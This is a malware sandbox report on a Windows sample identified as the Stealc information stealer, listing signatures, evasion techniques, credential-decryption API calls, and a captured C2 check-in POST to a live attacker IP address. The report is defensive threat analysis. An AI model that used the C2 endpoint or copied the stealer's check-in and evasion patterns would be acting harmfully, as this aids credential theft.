
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524978
MD5: 0c648c4dfca774a2f1d5204ac06ac5e0
SHA1: 0a095f75ca3115203ccee6f839e284ee6bb361d2
SHA256: c942c65b0db11adce8f7bded91a98d91e9c236a47cab99ea49d89acdb020c734
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1212 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0C648C4DFCA774A2F1D5204AC06AC5E0)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1212 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1212 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
0.2.file.exe.b70000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T14:48:04.999687+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: 0.2.file.exe.b70000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00B7C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B79AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00B79AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B77240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00B77240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B79B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00B79B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B88EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B88EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B84910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B7E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B7ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B84570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B83EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7BE70

                Networking

                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 38 38 37 41 32 37 32 31 42 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"3887A2721B951117388365------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"doma------AKFIDHDGIEGCAKFIIJKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B74880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00B74880
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37(
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpv
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37o

                System Summary

                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F33863
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EAD028
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E689C3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1C940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F38AB5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F30212
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E26BEE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F353ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E7ABB5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBA37A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3A4EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3F4DA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E474CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F31CC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F4457A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F40EF3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2FFAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3BF67
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DDFF05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F4A701
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B745C0 appears 316 times
                Source: file.exeStatic PE information: Section: vsethdti ZLIB complexity 0.9948937565337514
                Source: file.exe, 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B88680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00B88680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00B83720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\W17JLIX6.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.exeStatic file information: File size 1870848 > 1048576
                Source: file.exeStatic PE information: Raw size of vsethdti is bigger than: 0x100000 < 0x1a2800

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vsethdti:EW;ypmwblrh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vsethdti:EW;ypmwblrh:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B89860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca34f should be: 0x1d0a54
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: vsethdti
                Source: file.exeStatic PE information: section name: ypmwblrh
                Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FED8FD push 65FBCCE1h; mov dword ptr [esp], esi 0_2_00FED926
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FE40D2 push 72CF50F1h; mov dword ptr [esp], ebx 0_2_00FE4192
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FE58CC push esi; mov dword ptr [esp], 45DFC6E0h 0_2_00FE58E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB98B8 push ebx; mov dword ptr [esp], ebp 0_2_00FB98FA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ebp; mov dword ptr [esp], edi 0_2_00F428F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 3684A221h; mov dword ptr [esp], edi 0_2_00F42913
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ebx; mov dword ptr [esp], 773FDA05h 0_2_00F42965
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push edi; mov dword ptr [esp], ecx 0_2_00F42970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push esi; mov dword ptr [esp], edi 0_2_00F429EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ecx; mov dword ptr [esp], eax 0_2_00F42A02
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 2D55DB80h; mov dword ptr [esp], edx 0_2_00F42A17
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ecx; mov dword ptr [esp], 27CE3B00h 0_2_00F42A4D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ebp; mov dword ptr [esp], eax 0_2_00F42A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 38D9B001h; mov dword ptr [esp], ecx 0_2_00F42AD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push edx; mov dword ptr [esp], ebx 0_2_00F42B1F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ebp; mov dword ptr [esp], ecx 0_2_00F42B4A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 2DF0F473h; mov dword ptr [esp], ecx 0_2_00F42BED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push eax; mov dword ptr [esp], esi 0_2_00F42C05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 2338460Fh; mov dword ptr [esp], edi 0_2_00F42C0D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push ebx; mov dword ptr [esp], 00000001h 0_2_00F42C7A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebp 0_2_00F42C93
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push edx; mov dword ptr [esp], edi 0_2_00F42CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 278B83D4h; mov dword ptr [esp], eax 0_2_00F42D47
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 2476960Ah; mov dword ptr [esp], esi 0_2_00F42D95
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 40DBD939h; mov dword ptr [esp], edx 0_2_00F42DE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push edi; mov dword ptr [esp], esp 0_2_00F42DE7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 13F98E4Ch; mov dword ptr [esp], ecx 0_2_00F42E2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push 79B9358Ch; mov dword ptr [esp], edi 0_2_00F42E98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push edx; mov dword ptr [esp], FEA65A37h 0_2_00F42F3E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebp 0_2_00F42F5B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebx 0_2_00F42FAC
                Source: file.exeStatic PE information: section name: vsethdti entropy: 7.953545786264284

                Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13825)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49632 second address: F4965D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ch 0x00000007 jmp 00007FB958FCD456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497C2 second address: F497C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497C6 second address: F497CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497CF second address: F497D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497D5 second address: F497DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49C8E second address: F49CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FB958B07021h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4BDEB second address: F4BDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4BDF1 second address: F4BE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FB958B07025h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4BE14 second address: F4BE1E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958FCD44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4BF09 second address: F4BFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 add dword ptr [esp], 086A6EA8h 0x0000000c push edi 0x0000000d jmp 00007FB958B07028h 0x00000012 pop edx 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D3980h] 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e call 00007FB958B07020h 0x00000023 jp 00007FB958B07016h 0x00000029 pop esi 0x0000002a sub dword ptr [ebp+122D2A1Fh], edx 0x00000030 popad 0x00000031 push 00000003h 0x00000033 push 8EADDAC3h 0x00000038 jmp 00007FB958B07024h 0x0000003d add dword ptr [esp], 3152253Dh 0x00000044 jo 00007FB958B0701Eh 0x0000004a pushad 0x0000004b mov dx, E553h 0x0000004f mov dl, bh 0x00000051 popad 0x00000052 lea ebx, dword ptr [ebp+1244DD27h] 0x00000058 xor esi, 6612B647h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 jnp 00007FB958B07016h 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C064 second address: F4C07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958FCD44Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C07D second address: F4C0A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FB958B07020h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB958B0701Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C0A8 second address: F4C0FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+122D3AA8h] 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2A46h], esi 0x00000019 push 00000000h 0x0000001b mov edx, 50D96A28h 0x00000020 push 00000003h 0x00000022 mov dx, di 0x00000025 call 00007FB958FCD449h 0x0000002a jmp 00007FB958FCD44Eh 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007FB958FCD453h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C0FD second address: F4C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C101 second address: F4C105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C105 second address: F4C11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jg 00007FB958B07016h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
